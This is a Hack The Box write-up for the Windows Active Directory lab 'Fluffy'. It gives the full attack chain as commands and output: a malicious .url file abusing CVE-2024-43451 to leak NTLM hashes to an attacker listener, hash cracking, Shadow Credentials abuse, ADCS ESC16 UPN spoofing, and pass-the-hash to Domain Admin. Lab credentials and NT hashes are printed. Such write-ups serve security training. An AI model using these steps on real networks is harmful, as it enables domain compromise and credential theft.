Fluffy — 0xnrg.se

Hack The Box · Lab

EasyWindowsActive Directory

IP: 10.10.11.69 | Difficulty: Medium | OS: Windows

Environment Setup

export IP=10.10.11.69
echo "10.10.11.69  fluffy.htb dc01.fluffy.htb" >> /etc/hosts

Step 1 — Reconnaissance

Why: Identify open services and domain structure.

nmap -sC -sV -p- --min-rate 10000 -oA nmap/fluffy 10.10.11.69

Key findings: Standard AD ports (53, 88, 389, 445, 636, 3268, 5985). Domain: fluffy.htb. DC: DC01.

Step 2 — SMB Enumeration — j.fleischman Foothold

Why: Guest access reveals shares. j.fleischman has READ/WRITE on the IT share, and the share contains a PDF noting server CVE exposure.

crackmapexec smb 10.10.11.69 --shares -u '' -p ''
nxc smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares

Output:

SMB  10.10.11.69  445  DC01  IT  READ,WRITE

smbclient //10.10.11.69/IT -U 'j.fleischman%J0elTHEM4n1990!'
smb: \> ls
  # PDF document listing server CVE exposure (CVE-2024-43451)

Key findings:

j.fleischman has WRITE access to //IT — arbitrary file upload
PDF in the share references CVE-2024-43451 — server is unpatched and vulnerable

Step 3 — CVE-2024-43451 — NTLMv2 Coerce

Why: CVE-2024-43451 (Windows NTLM Hash Disclosure) allows placing a malicious .url file in a writable SMB share. When any user on the server opens the directory, NTLM authentication is triggered to the attacker's listener. Since j.fleischman has WRITE access to //IT, we upload the file and capture p.agila's NTLMv2 via Responder.

# Start Responder
sudo responder -I tun0

# Create malicious .url file
cat > @file.url << 'EOF'
[InternetShortcut]
URL=file://10.10.14.X/share
EOF

# Upload to IT share
smbclient //10.10.11.69/IT -U 'j.fleischman%J0elTHEM4n1990!'
smb: \> put @file.url

Output:

[SMB] NTLMv2 Username : fluffy\p.agila
[SMB] NTLMv2 Hash     : p.agila::fluffy:<challenge>:<response>:<challenge2>

hashcat -m 5600 p.agila.hash /usr/share/wordlists/rockyou.txt

Key findings: Cracked: p.agila:<REDACTED>

Step 4 — ADCS Enumeration

Why: Confirm ADCS is present and identify the CA name for later exploitation.

nxc ldap 10.10.11.69 -u 'p.agila' -p '<REDACTED>' -M adcs

Output:

ADCS  10.10.11.69  389  DC01  Found PKI Enrollment Server: DC01.fluffy.htb
ADCS  10.10.11.69  389  DC01  Found CN: fluffy-DC01-CA

Key findings: ADCS present — CA: fluffy-DC01-CA on DC01.fluffy.htb.

Step 5 — BloodHound — ACL Path Discovery

Why: BloodHound reveals the privilege escalation path from p.agila through service accounts to Domain Admin via Shadow Credentials and ADCS.

bloodhound-python -u 'p.agila' -p '<REDACTED>' -ns 10.10.11.69 -d fluffy.htb -c all

Output:

p.agila → MemberOf → SERVICE ACCOUNTS MANAGERS
SERVICE ACCOUNTS MANAGERS → GenericAll → SERVICE ACCOUNTS
SERVICE ACCOUNTS → GenericWrite → winrm_svc, ca_svc, ldap_svc

# Add p.agila to SERVICE ACCOUNTS (GenericAll allows this)
net rpc group addmem "SERVICE ACCOUNTS" "p.agila" \
    -U "FLUFFY.HTB"/"p.agila"%"<REDACTED>" -S "DC01.FLUFFY.HTB"

Key findings:

p.agila is in SERVICE ACCOUNTS MANAGERS → GenericAll over SERVICE ACCOUNTS group
SERVICE ACCOUNTS has GenericWrite on winrm_svc and ca_svc
Path: Shadow Credentials on winrm_svc (shell) → Shadow Credentials on ca_svc → ADCS ESC16

Step 6 — Shadow Credentials — winrm_svc

Why: With GenericWrite on winrm_svc, we inject a msDS-KeyCredentialLink via pywhisker. This enables PKINIT authentication — obtain a TGT, then recover the NT hash without knowing the password.

pywhisker.py -d "fluffy.htb" -u "p.agila" -p "<REDACTED>" \
    --target "winrm_svc" --action "add"

Output:

[+] Updated the msDS-KeyCredentialLink attribute of winrm_svc
[+] Saved PFX: yHBfrZXx.pfx
[*] Password: hOuFC8p5rGy1HnPsnRvL

# Get TGT via PKINIT
gettgtpkinit.py -cert-pem yHBfrZXx_cert.pem -key-pem yHBfrZXx_priv.pem \
    fluffy.htb/winrm_svc winrm_svc.ccache

export KRB5CCNAME=winrm_svc.ccache

# Recover NT hash using AS-REP encryption key
getnthash.py -key b218f1a8c6c39d7e2d7cbf28d033f2180bb0bf66ee83b30b1cb4cae9d7063dbe \
    fluffy.htb/winrm_svc

Output:

Recovered NT Hash
33bd09dcd697600edf6b3a7af4875767

evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767

Key findings: Shell as winrm_svc. user.txt obtained.

Step 7 — Shadow Credentials — ca_svc

Why: ca_svc is the ADCS service account with certificate enrollment rights. Recovering its NT hash enables authenticated ADCS operations including the ESC16 exploit.

pywhisker.py -d "fluffy.htb" -u "p.agila" -p "<REDACTED>" \
    --target "ca_svc" --action "add"

gettgtpkinit.py -cert-pem uswoiVwj_cert.pem -key-pem uswoiVwj_priv.pem \
    fluffy.htb/ca_svc ca_svc.ccache

export KRB5CCNAME=ca_svc.ccache

getnthash.py -key f04ebf8a824a166636a1549e6594c6ae258e2800210871816cc79c369259592a \
    fluffy.htb/ca_svc

Output:

Recovered NT Hash
ca0f4f9e9eb8a092addf53bb03fc98c8

Key findings: ca_svc NT hash recovered: ca0f4f9e9eb8a092addf53bb03fc98c8

Step 8 — Certipy — ESC16 Vulnerability Confirmation

Why: ESC16 occurs when the Security Extension (szOID_NTDS_CA_SECURITY_EXT, OID 1.3.6.1.4.1.311.25.2) is disabled on the CA. Without it, certificates are matched to domain accounts solely by UPN — enabling UPN spoofing to impersonate any user.

certipy-ad find -vulnerable -u ca_svc@fluffy.htb \
    -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -stdout

Output:

[!] Vulnerabilities
  ESC16: Security Extension is disabled.
Disabled Extensions: 1.3.6.1.4.1.311.25.2

Key findings: fluffy-DC01-CA is vulnerable to ESC16 — Security Extension disabled, UPN spoofing viable.

Step 9 — ESC16 Exploitation — Impersonate Administrator

Why: ESC16 + ca_svc's GenericWrite rights: (1) temporarily change ca_svc's UPN to administrator, (2) request a User certificate as ca_svc, (3) revert the UPN, (4) authenticate with the certificate to get Administrator's NT hash. The CA issues the cert with UPN administrator because the Security Extension is disabled.

# Step 1 — Read current UPN (ca_svc@fluffy.htb)
certipy-ad account -u 'p.agila@fluffy.htb' -p '<REDACTED>' \
    -dc-ip '10.10.11.69' -user 'ca_svc' read

# Step 2 — Update ca_svc UPN to 'administrator'
certipy-ad account -u 'winrm_svc@fluffy.htb' \
    -hashes ':33bd09dcd697600edf6b3a7af4875767' \
    -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update

Output: [*] Successfully updated 'ca_svc'

# Step 3 — Request certificate as ca_svc (UPN now = administrator)
export KRB5CCNAME=ca_svc.ccache
certipy-ad req -k -dc-ip '10.10.11.69' \
    -target 'DC01.FLUFFY.HTB' \
    -ca 'fluffy-DC01-CA' \
    -template 'User'

Output:

[*] Got certificate with UPN 'administrator'
[*] Saving certificate and private key to 'administrator.pfx'

# Step 4 — Revert ca_svc UPN
certipy-ad account -u 'winrm_svc@fluffy.htb' \
    -hashes ':33bd09dcd697600edf6b3a7af4875767' \
    -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

Key findings: Certificate issued with UPN administrator — ready for PKINIT authentication.

Step 10 — Certipy Auth — Administrator NT Hash

Why: Authenticate using the forged administrator certificate via PKINIT to obtain the Administrator NT hash.

certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' \
    -username 'administrator' -domain 'fluffy.htb'

Output:

[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

Key findings: Administrator NT hash recovered — pass-the-hash to full domain access.

Step 11 — Evil-WinRM — SYSTEM

Why: Administrator NT hash grants full domain access via Pass-the-Hash.

evil-winrm -i 10.10.11.69 -u administrator -H <REDACTED>

Output:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
<REDACTED>

Key findings: 🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED

Credentials

Account	Secret
j.fleischman	J0elTHEM4n1990!
p.agila	(Responder NTLMv2 → hashcat)
winrm_svc	33bd09dcd697600edf6b3a7af4875767 (NT)
ca_svc	ca0f4f9e9eb8a092addf53bb03fc98c8 (NT)
Administrator	(NT, certipy ESC16)

Full Attack Chain

SMB guest → j.fleischman:J0elTHEM4n1990! → READ/WRITE //IT
    └─ CVE-2024-43451: upload @file.url → Responder NTLMv2 p.agila
         └─ hashcat → p.agila:<REDACTED>
                └─ nxc ADCS → fluffy-DC01-CA
                        └─ BloodHound: SERVICE ACCOUNTS MANAGERS → GenericAll → SERVICE ACCOUNTS
               SERVICE ACCOUNTS → GenericWrite → winrm_svc, ca_svc
                                    └─ net rpc add p.agila → SERVICE ACCOUNTS
                                            └─ pywhisker winrm_svc → Shadow Credentials
                                                    └─ gettgtpkinit + getnthash → winrm_svc NT hash
                                                            └─ evil-winrm winrm_svc → user.txt ✓
                                                                    └─ pywhisker ca_svc → Shadow Credentials
                                                                            └─ gettgtpkinit + getnthash → ca_svc NT hash
                                                                                    └─ certipy find → ESC16 (Security Extension disabled)
                                                                                            └─ update ca_svc UPN → 'administrator'
                                                                                                    └─ certipy req User template → administrator.pfx
                                                                                                            └─ revert ca_svc UPN
                                                                                                                    └─ certipy auth → Administrator NT hash
                                                                                                                            └─ evil-winrm PTH → SYSTEM
                                                                  🏴 ROOTED